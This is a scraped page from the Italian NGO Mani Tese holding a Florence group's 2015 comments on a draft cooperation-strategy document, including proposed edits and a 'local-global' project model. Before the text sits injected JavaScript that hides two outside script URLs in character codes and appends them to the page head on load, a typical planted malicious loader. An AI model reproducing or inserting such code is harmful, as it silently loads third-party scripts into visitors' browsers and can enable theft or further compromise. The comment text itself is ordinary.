var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Commenti al documento finale sulla cooperazione - Mani TeseMani Tese

← Torna a Laboratorio di idee

Commenti al documento finale sulla cooperazione

0

29 maggio 2015

DA FIRENZE

Riteniamo che il documento non abbia recepito le istanze emerse durante gli incontri che ci sono stati e che sia poco innovativo.

Tuttavia cerchiamo di fare alcune proposte di modifica puntuali:

  • Nella premessa eliminare la frase che ” giustifica” i processi partecipativi in funzione del rapporto fra sede più professionale e base storica  e sostituire con l’affermazione che i processi partecipativi sono doverosi in quanto siamo una associazione. Ci sembra anche poco rispettoso parlare di persone più professionalizzate rispetto a prima;
  • Paragrafo micro: levare dal titolo “dalle” e invece aggiungere fra le critiche quella più importante e cioè lo scollamento fra l’azione politica di MT e le micro che spesso hanno vissuto in Mani Tese una vita parallela,poco intrecciata fra loro;
  • Paragrafo “ai progetti di cooperazione”: cambiare la denominazione troppo generica (anche le micro erano progetti di cooperazione); forse potremmo chiamarli di cooperazione programmatica o macro-progetti.
  • Inserire ,come fatto per le micro, l’accenno ad alcune criticità già oggi evidenti,quali il rischio di dipendenza dai finanziamenti pubblici che influenza pesantemente ad esempio la scelta delle aree (scomparsa progetti con America Latina  od obbligo del cofinanziamento per accettare una richiesta ad esempio)e anche la necessità di compromessi gestionali,soprattutto quando i partenariati sono molto larghi.
  • Paragrafo progetti solidarietà: Il paragrafo ci risulta poco comprensibile e molto vago e residuale e proponiamo di sostituirlo con il seguente:

PROGETTI LOCALE-GLOBALE

L’associazione si impegna a sperimentare dei progetti di cooperazione locale-globalenord- sud. I progetti di cooperazione  di cui ai paragrafi precedenti,siano essi caratterizzati da attività micro  o programmatiche,rimangono influenzati da una tendenza di fondo che è’ quella di intervenire a senso unico nel Sud del mondo fondamentalmente come finanziatori.

questo approccio appare superato dai mutamenti internazionali  che vedono sempre più intrecciati Nord e Sud e richiedono che il cambiamento,attraverso anche i progetti di cooperazione,vada proposto parallelamente sia al nord che al sud su alcune tematiche forti politicamente scelte dall’assemblea.

Si tratta di azioni ponte NORD SUD che devono collegare  il locale al globale dove le azioni prevalgono sul finanziamento. Azioni parallele ma interagenti che vanno sperimentate in modo innovativo dalla nostra associazione a sostegno di campagne ben precise e documentate sia al nord che al sud.

  •  Progetti in Italia: Il paragrafo può essere conservato tenendo conto di quanto espresso in quello sulla cooperazione glocale, la quale già implica il sostegno a progetti in Italia. I progetti in Italia sarebbero a questo punto quelli che non prevedono una azione parallela e collegata con un partner del Sud.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

MANITESE OPERA IN 11 PAESI DEL MONDO